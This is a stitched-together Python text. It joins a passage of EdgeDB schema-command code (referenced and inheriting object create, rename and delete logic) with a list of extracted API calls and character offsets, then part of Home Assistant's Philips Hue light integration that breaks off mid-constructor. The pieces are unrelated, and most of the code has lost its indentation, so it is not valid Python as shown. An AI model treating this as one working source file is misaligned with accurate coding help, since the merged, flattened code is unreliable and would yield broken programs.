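        """Return a name qualifier that is a SHA1 hash of *exprs*."""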
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
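        """Build a delta with nested Alter commands for the referrer chain.

        Walks from *scls* (or the given *referrer*) up through all
        referring objects and returns the resulting DeltaRoot along with
        the innermost command to which this command should be attached.
        """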
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
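    """CREATE command for referenced objects.

    Handles the DDL form in which the object is declared inside its
    referrer (the *referenced_astnode* form) by recording the back
    reference to the referrer and marking the object as locally defined.
    """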
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
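        # Look up the corresponding ref in each base of the referrer;
        # every non-final match becomes an implicit base of this ref.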
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
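        # Apply the operation (via cb) to every descendant ref, wrapped
        # in Alter commands for the descendant and its referrer.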
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
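                # Merge the implicitly inherited bases with any
                # explicitly declared bases.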
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
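            # Propagate the deletion to each child of the referrer that
            # has a corresponding inherited ref.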
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| [
"edb.common.struct.Field",
"hashlib.sha1",
"edb.edgeql.ast.ObjectRef",
"edb.errors.SchemaDefinitionError",
"edb.errors.SchemaError"
] | [((34717, 34750), 'edb.common.struct.Field', 'struct.Field', (['bool'], {'default': '(False)'}), '(bool, default=False)\n', (34729, 34750), False, 'from edb.common import struct\n'), ((12110, 12124), 'hashlib.sha1', 'hashlib.sha1', ([], {}), '()\n', (12122, 12124), False, 'import hashlib\n'), ((3477, 3550), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot derive {self!r}({derived_name}) from itself"""'], {}), "(f'cannot derive {self!r}({derived_name}) from itself')\n", (3495, 3550), False, 'from edb import errors\n'), ((36944, 37122), 'edb.errors.SchemaDefinitionError', 'errors.SchemaDefinitionError', (['f"""cannot rename inherited {vn}"""'], {'details': 'f"""{vn} is inherited from {bases_str}, which {verb} not being renamed"""', 'context': 'self.source_context'}), "(f'cannot rename inherited {vn}', details=\n f'{vn} is inherited from {bases_str}, which {verb} not being renamed',\n context=self.source_context)\n", (36972, 37122), False, 'from edb import errors\n'), ((38084, 38113), 'edb.edgeql.ast.ObjectRef', 'qlast.ObjectRef', ([], {'name': 'refname'}), '(name=refname)\n', (38099, 38113), True, 'from edb.edgeql import ast as qlast\n'), ((40315, 40449), 'edb.errors.SchemaError', 'errors.SchemaError', (['f"""cannot drop inherited {vn}"""'], {'context': 'self.source_context', 'details': 'f"""{vn} is inherited from:\n- {pnames}"""'}), '(f\'cannot drop inherited {vn}\', context=self.\n source_context, details=f"""{vn} is inherited from:\n- {pnames}""")\n', (40333, 40449), False, 'from edb import errors\n')] |
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
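        # A group's supported features are the union of its member
        # lights' features, defaulting to extended color support.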
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
